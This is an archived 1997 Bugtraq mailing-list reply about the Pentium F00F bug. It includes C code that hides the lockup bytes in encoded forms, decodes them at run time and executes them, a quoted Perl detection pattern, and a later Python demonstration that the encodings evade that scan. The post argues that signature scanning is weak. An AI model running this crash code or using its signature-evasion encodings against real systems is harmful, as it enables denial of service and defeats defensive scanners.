Bugtraq mailing list archives
Re: Intel Pentium Bug
From: kragen () DNACO NET (Kragen \)
Date: Mon, 10 Nov 1997 07:35:16 -0500
On Sun, 9 Nov 1997, Jason Parsons wrote:
Re the F0 0F C7 C8 Pentium bug:
I just wanted to repost this from the Linux-security list. Thought it
might be helpful to some here. This was posted to Linux-security by Sam
Trenholme <set () reality samiam org>.
if($data =~ /\xf0\x0f\xc7\xc8/) {
    print "$dir/$file contains F0 0F C7 C8\n";
}
Is this intended to keep malicious people from crashing your computer?
It is trivial to defeat this, and it is impossible, in the general case,
to determine whether or not a program can compute f0 0f c7 c8 and execute
it.
Here are some trivial examples of ways to defeat it:
/*
 * Demonstrate a trivial way to crash a Pentium, f0 0f c7 c8
 * (the byte sequence is lock cmpxchg8b eax; none of the four
 * arrays below contains it literally until it is decoded at run time)
 */
#include <string.h>

/* each byte stored one higher than the target; fix_incr() decrements */
char incr[] = "\xf1\x10\xc8\xc9";
void
fix_incr (char *s) {
	for (; *s; s++) --*s;
}

/* the target bytes stored in reverse order */
char backwards[] = "\xc8\xc7\x0f\xf0";
void
reverse_inner(char *begin, char *end) {
	while (end > begin) {
		char t = *end;
		*end = *begin;
		*begin = t;
		end--;
		begin++;
	}
}
void
reverse(char *s) {
	reverse_inner(s, s+strlen(s)-1);
}

/* the target bytes XORed with 1: f0 0f c7 c8 ^ 01 -> f1 0e c6 c9 */
char xored[] = "\xf1\x0e\xc6\xc9";
void
xor_pad (char *s, char pad) {
	for (; *s; s++) *s ^= pad;
}

/* the target bytes interleaved with filler; keep the odd positions */
char interleaved[] = { 'X', '\xf0', 'Y', '\x0f', 'Z', '\xc7', 'A', '\xc8',
	'\0'};
void
deinterleave (char *s) {
	char *t = s + 1;
	while (*t) {
		*s++ = *t;
		if (!t[1]) break;	/* don't step past the terminator */
		t += 2;
	}
	*s = '\0';
}

int
main(void) {
	void (*f)(void);
	fix_incr(incr);
	reverse(backwards);
	xor_pad(xored, 1);
	deinterleave(interleaved);
	/* the data segment must be executable for this jump to work */
	f = (void (*)(void)) incr; /* or backwards, or xored, or interleaved */
	(*f)();
	return 0;
}
Now, none of these are very subtle. I could easily write something that
contained a piece of nonsense text, took the second-to-last bit from each
character, and assembled f1 0e c9 c8 from it. The possibilities are
endless.
A trusted-compiler system seems to be the only possible software
protection against attacks like these.
Kragen
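As an added illustration of the point above (this is not part of Kragen's post or of the Linux-security script), here is the Perl byte test re-implemented in Python and run over constructed copies of the four encoded strings from the post, together with the matching decode step for each. Everything in it is assumed from the bytes shown above; the xored string is written here as f1 0e c6 c9, since XOR with 1 maps c7 c8 to c6 c9, whereas the post's c9 c8 pair XORs back to c8 c9, not c7 c8.

```python
"""Why a fixed byte signature is a weak control: the naive scan from the
Linux-security script, run over encoded forms of the same four bytes."""
from typing import Optional

# lock cmpxchg8b eax, the Pentium F00F sequence
F00F = b"\xf0\x0f\xc7\xc8"


def contains_f00f(data: bytes) -> Optional[int]:
    """Python equivalent of  $data =~ /\\xf0\\x0f\\xc7\\xc8/ :
    offset of the first literal match, or None when absent."""
    idx = data.find(F00F)
    return None if idx < 0 else idx


# Constructed copies of the encoded arrays from the post (the xored one
# with the byte pair that actually XORs back to c7 c8).
ENCODED = {
    "incr": b"\xf1\x10\xc8\xc9",          # each byte one higher
    "backwards": b"\xc8\xc7\x0f\xf0",     # reversed
    "xored": b"\xf1\x0e\xc6\xc9",         # XOR 1
    "interleaved": b"X\xf0Y\x0fZ\xc7A\xc8",  # filler in even positions
}


def decode(name: str, data: bytes) -> bytes:
    """The run-time transformation the corresponding C function applies."""
    if name == "incr":
        return bytes((b - 1) & 0xFF for b in data)
    if name == "backwards":
        return data[::-1]
    if name == "xored":
        return bytes(b ^ 1 for b in data)
    if name == "interleaved":
        return data[1::2]
    raise ValueError(f"unknown encoding {name!r}")


def scan_results():
    """For each encoding: (match offset in the stored bytes,
    match offset after the program's own decode step)."""
    return {
        name: (contains_f00f(enc), contains_f00f(decode(name, enc)))
        for name, enc in ENCODED.items()
    }


if __name__ == "__main__":
    for name, (stored, decoded) in scan_results().items():
        print(f"{name:12s} stored: {stored}  after decode: {decoded}")
```

Every stored form scans clean and every decoded form matches at offset 0, which is the whole of the argument: the signature only ever finds the literal sequence, so a scan of files at rest says nothing about what a program will assemble once it runs.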